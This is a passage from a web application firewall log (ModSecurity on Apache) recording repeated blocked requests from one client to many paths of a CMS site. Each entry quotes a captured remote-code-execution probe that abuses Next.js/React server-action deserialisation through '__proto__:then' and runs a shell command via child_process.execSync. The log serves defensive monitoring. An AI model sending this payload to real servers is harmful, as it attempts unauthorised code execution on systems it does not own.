Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/portal"] [unique_id "aaZAcPU_evpVetAt05Vh4QAAAAw"] [Tue Mar 03 03:59:12.528514 2026] [:error] [pid 21979:tid 21996] [client 172.94.9.249:48220] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "aaZAcP2xhCLtpShpTOoyugAAAM8"] [Tue Mar 03 03:59:12.529664 2026] [:error] [pid 21979:tid 21983] [client 172.94.9.249:48124] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "aaZAcP2xhCLtpShpTOoyuwAAAMI"] [Tue Mar 03 03:59:12.529952 2026] [:error] [pid 21979:tid 21986] [client 172.94.9.249:48014] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/sign-up"] [unique_id "aaZAcP2xhCLtpShpTOoyvAAAAMU"] [Tue Mar 03 03:59:12.530047 2026] [:error] [pid 21860:tid 21871] [client 172.94.9.249:47914] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "aaZAcPU_evpVetAt05Vh4gAAAAc"] [Tue Mar 03 03:59:12.530795 2026] [:error] [pid 21860:tid 21875] [client 172.94.9.249:48228] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/booking"] [unique_id "aaZAcPU_evpVetAt05Vh4wAAAAs"] [Tue Mar 03 03:59:12.530798 2026] [:error] [pid 21861:tid 21907] [client 172.94.9.249:47922] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "aaZAcNsyBa6FPxjfniwsggAAAEk"] [Tue Mar 03 03:59:12.530855 2026] [:error] [pid 21979:tid 22002] [client 172.94.9.249:48218] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/pricing"] [unique_id "aaZAcP2xhCLtpShpTOoyvQAAANU"] [Tue Mar 03 03:59:12.530948 2026] [:error] [pid 21862:tid 21941] [client 172.94.9.249:47582] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "aaZAcPh_lrWoDSo4I3Rn1QAAAJc"] [Tue Mar 03 03:59:12.531808 2026] [:error] [pid 21861:tid 21921] [client 172.94.9.249:47886] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "aaZAcNsyBa6FPxjfniwsgwAAAFA"] [Tue Mar 03 03:59:12.532799 2026] [:error] [pid 21862:tid 21896] [client 172.94.9.249:47966] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/support"] [unique_id "aaZAcPh_lrWoDSo4I3Rn1gAAAIA"] [Tue Mar 03 03:59:12.532995 2026] [:error] [pid 21979:tid 22001] [client 172.94.9.249:47950] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "aaZAcP2xhCLtpShpTOoyvgAAANQ"] [Tue Mar 03 03:59:12.533013 2026] [:error] [pid 21861:tid 21931] [client 172.94.9.249:48002] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/help"] [unique_id "aaZAcNsyBa6FPxjfniwshAAAAFU"] [Tue Mar 03 03:59:12.533496 2026] [:error] [pid 21979:tid 22004] [client 172.94.9.249:47976] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "aaZAcP2xhCLtpShpTOoyvwAAANc"] [Tue Mar 03 03:59:12.533945 2026] [:error] [pid 21860:tid 21874] [client 172.94.9.249:47628] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/order"] [unique_id "aaZAcPU_evpVetAt05Vh5AAAAAo"] [Tue Mar 03 03:59:12.534262 2026] [:error] [pid 21862:tid 21906] [client 172.94.9.249:47938] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "aaZAcPh_lrWoDSo4I3Rn2AAAAIU"] [Tue Mar 03 03:59:12.534321 2026] [:error] [pid 21862:tid 21920] [client 172.94.9.249:48104] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "aaZAcPh_lrWoDSo4I3Rn1wAAAIw"] [Tue Mar 03 03:59:12.534693 2026] [:error] [pid 21862:tid 21924] [client 172.94.9.249:48064] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/docs"] [unique_id "aaZAcPh_lrWoDSo4I3Rn2QAAAI4"] [Tue Mar 03 03:59:12.534836 2026] [:error] [pid 21979:tid 21982] [client 172.94.9.249:48172] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "aaZAcP2xhCLtpShpTOoywAAAAME"] [Tue Mar 03 03:59:12.536451 2026] [:error] [pid 21862:tid 21942] [client 172.94.9.249:47898] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "aaZAcPh_lrWoDSo4I3Rn2gAAAJg"] [Tue Mar 03 03:59:12.537759 2026] [:error] [pid 21979:tid 21999] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match 